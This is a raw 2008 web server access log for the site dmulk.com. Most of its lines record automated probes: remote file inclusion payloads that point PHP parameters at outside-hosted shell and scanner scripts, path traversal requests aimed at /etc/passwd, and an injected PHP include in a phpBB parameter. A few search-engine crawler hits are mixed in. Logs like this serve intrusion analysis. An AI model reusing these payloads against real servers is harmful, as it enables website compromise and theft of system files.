74.53.240.146 - - [13/Jul/2008:10:57:39 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
168.210.90.180 - - [13/Jul/2008:10:57:44 -0700] "GET /logs/access.log HTTP/1.1" 200 174935 "http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=all&itag=crv&l=en&ics=utf-8&cs=utf8&wf[n]=3&wf[0][r]=%20&wf[0][q]=m&wf[0][w]=&wf[1][r]=%20&wf[1][q]=@hotmail.com&wf[1][w]=&wf[2][r]=-&wf[2][q]=spam&wf[2][w]=&dincl=&dexcl=&geo=eu&doctype=text&dfr[u]=on&dfr[d]=1&dfr[m]=1&dfr[y]=2007&dto[d]=13&dto[m]=7&dto[y]=2008&hits=10&o=80" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SPOENB/1.0; .NET CLR 2.0.50727; SPOENB/1.0)" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:10:57:45 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:10:57:45 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:10:57:50 -0700] "GET /logs/access_080329.log//?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:10:57:54 -0700] "GET //?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 200 18361 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:10:58:11 -0700] "GET /logs/access_080329.log//?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:10:58:13 -0700] "GET //?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 200 18377 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:10:58:14 -0700] "GET /logs//?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 200 55998 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:10:58:17 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:10:58:17 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:10:58:24 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:10:58:24 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:10:58:24 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:10:58:25 -0700] "GET /logs/access_080315.log//?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:10:58:55 -0700] "GET /logs/access_080315.log//?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:10:59:05 -0700] "GET /logs/access_080329.log//?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:10:59:07 -0700] "GET //?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 200 18377 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:10:59:07 -0700] "GET /logs//?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 200 55998 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:10:59:09 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:10:59:10 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:10:59:14 -0700] "GET /logs/access_080103.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:10:59:14 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:10:59:14 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.249.73.55 - - [13/Jul/2008:10:59:32 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/trackback/?show=gallery&nggpage=3 HTTP/1.1" 200 20300 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
72.37.237.58 - - [13/Jul/2008:10:59:53 -0700] "GET /logs/access_080315.log//?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.122.79.161 - - [13/Jul/2008:10:59:54 -0700] "GET /logs/home.php?pagina=http://meth.uk.to/resp.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
128.122.79.161 - - [13/Jul/2008:10:59:54 -0700] "GET /home.php?pagina=http://meth.uk.to/resp.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:11:00:01 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:11:00:02 -0700] "GET /logs/access_080123.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.195.37.125 - - [13/Jul/2008:11:00:05 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/ HTTP/1.0" 200 9419 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [13/Jul/2008:11:00:05 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [13/Jul/2008:11:00:06 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [13/Jul/2008:11:00:06 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
208.75.225.10 - - [13/Jul/2008:11:00:24 -0700] "GET /logs/home.php?pagina=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:11:00:24 -0700] "GET /home.php?pagina=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.235.41.3 - - [13/Jul/2008:11:00:46 -0700] "GET /logs/access_071230.log/?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.41.3 - - [13/Jul/2008:11:00:49 -0700] "GET /?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18507 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.41.3 - - [13/Jul/2008:11:00:49 -0700] "GET /logs/?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 55993 "-" "libwww-perl/5.805" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:11:00:55 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.87.117 - - [13/Jul/2008:11:00:58 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
210.245.87.117 - - [13/Jul/2008:11:00:59 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 200 3694 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
210.245.87.117 - - [13/Jul/2008:11:01:34 -0700] "GET /errors.php?error=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
210.245.87.117 - - [13/Jul/2008:11:01:34 -0700] "GET /logs/errors.php?error=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
195.11.67.10 - - [13/Jul/2008:11:01:35 -0700] "GET /logs/access_080103.log HTTP/1.1" 200 448825 "-" "bdHgylxwhyhionqnvrrfon9oyyjcmfhoq9b" "www.dmulk.com"
72.249.29.43 - - [13/Jul/2008:11:02:03 -0700] "GET /logs/access_080105.log/index.php?configFile=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [13/Jul/2008:11:02:04 -0700] "GET /logs/index.php?configFile=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [13/Jul/2008:11:02:05 -0700] "GET /index.php?configFile=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 200 18439 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [13/Jul/2008:11:02:10 -0700] "GET /logs/index.php?configFile=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [13/Jul/2008:11:02:10 -0700] "GET /logs/access_080105.log/index.php?configFile=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [13/Jul/2008:11:02:13 -0700] "GET /index.php?configFile=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 200 18439 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:11:02:30 -0700] "GET /logs/index.php?redir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:11:02:36 -0700] "GET /logs/index.php?redir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:11:02:44 -0700] "GET /index.php?redir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18395 "-" "libwww-perl/5.805" "www.dmulk.com"
85.131.171.231 - - [13/Jul/2008:11:02:49 -0700] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.131.171.231 - - [13/Jul/2008:11:02:49 -0700] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:11:02:53 -0700] "GET /index.php?redir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 200 18353 "-" "libwww-perl/5.805" "www.dmulk.com"
200.206.182.158 - - [13/Jul/2008:11:03:12 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [13/Jul/2008:11:03:17 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [13/Jul/2008:11:03:22 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.29.43 - - [13/Jul/2008:11:03:31 -0700] "GET /logs/access_080420.log/index.php?configFile=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.1.26.136 - - [13/Jul/2008:11:03:38 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.26.136 - - [13/Jul/2008:11:03:38 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.26.136 - - [13/Jul/2008:11:03:38 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.26.136 - - [13/Jul/2008:11:03:39 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:11:03:44 -0700] "GET /logs/access_080329.log//?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.110.250.75 - - [13/Jul/2008:11:03:46 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:11:03:47 -0700] "GET //?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 200 18377 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:11:03:48 -0700] "GET /logs//?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 200 55998 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:11:04:23 -0700] "GET //?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 200 18377 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:11:04:25 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:11:04:26 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:11:04:26 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:11:04:26 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:11:04:27 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:11:04:27 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:11:04:27 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:11:04:28 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:11:04:28 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:04:31 -0700] "GET /logs/access_071230.log/?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:04:32 -0700] "GET /?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18507 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:04:33 -0700] "GET /logs/?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 55993 "-" "libwww-perl/5.812" "www.dmulk.com"
217.217.156.81 - - [13/Jul/2008:11:04:41 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.217.156.81 - - [13/Jul/2008:11:04:41 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.217.156.81 - - [13/Jul/2008:11:04:42 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
63.110.250.75 - - [13/Jul/2008:11:04:42 -0700] "GET /logs/access_080104.log//skin/zero_vote/ask_password.php?dir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:04:56 -0700] "GET /logs/access.log/errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:04:56 -0700] "GET /errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:04:57 -0700] "GET /logs/errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.146.70.18 - - [13/Jul/2008:11:05:09 -0700] "GET /logs/access_080214.log//index.php?canal=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.146.70.18 - - [13/Jul/2008:11:05:11 -0700] "GET //index.php?canal=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 200 18395 "-" "libwww-perl/5.76" "www.dmulk.com"
216.146.70.18 - - [13/Jul/2008:11:05:12 -0700] "GET /logs//index.php?canal=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.111.176.84 - - [13/Jul/2008:11:05:13 -0700] "GET /logs/index.php?inc_dir=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.146.70.18 - - [13/Jul/2008:11:05:13 -0700] "GET /logs/access_080303.log//index.php?canal=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.111.176.84 - - [13/Jul/2008:11:05:17 -0700] "GET /index.php?inc_dir=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 200 18411 "-" "libwww-perl/5.805" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:05:41 -0700] "GET /logs/access_071230.log/?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:05:43 -0700] "GET /?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18499 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:11:05:44 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:11:05:44 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:11:05:44 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:05:44 -0700] "GET /logs/?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 55993 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.25.167 - - [13/Jul/2008:11:06:13 -0700] "GET /logs//?config=1&base_datapath=http://www.kita-billstedt.de/willkommen/cache/cmd7.gif?? HTTP/1.1" 200 55998 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
80.67.25.167 - - [13/Jul/2008:11:06:14 -0700] "GET //?config=1&base_datapath=http://www.kita-billstedt.de/willkommen/cache/cmd7.gif?? HTTP/1.1" 200 18467 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
64.72.112.223 - - [13/Jul/2008:11:06:34 -0700] "GET /logs/index.php?inc_dir=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.223 - - [13/Jul/2008:11:06:35 -0700] "GET /index.php?inc_dir=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 200 18431 "-" "libwww-perl/5.800" "www.dmulk.com"
64.235.41.3 - - [13/Jul/2008:11:06:36 -0700] "GET /logs/access_080329.log/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.41.3 - - [13/Jul/2008:11:06:40 -0700] "GET /index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18591 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.41.3 - - [13/Jul/2008:11:06:40 -0700] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:06:47 -0700] "GET /logs/access_080218.log/?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
63.110.250.75 - - [13/Jul/2008:11:06:54 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 200 18541 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:11:07:02 -0700] "GET /logs/main.php?x=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:11:07:03 -0700] "GET /main.php?x=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:07:19 -0700] "GET /logs/access_080329.log/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:07:21 -0700] "GET /index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18583 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:07:22 -0700] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
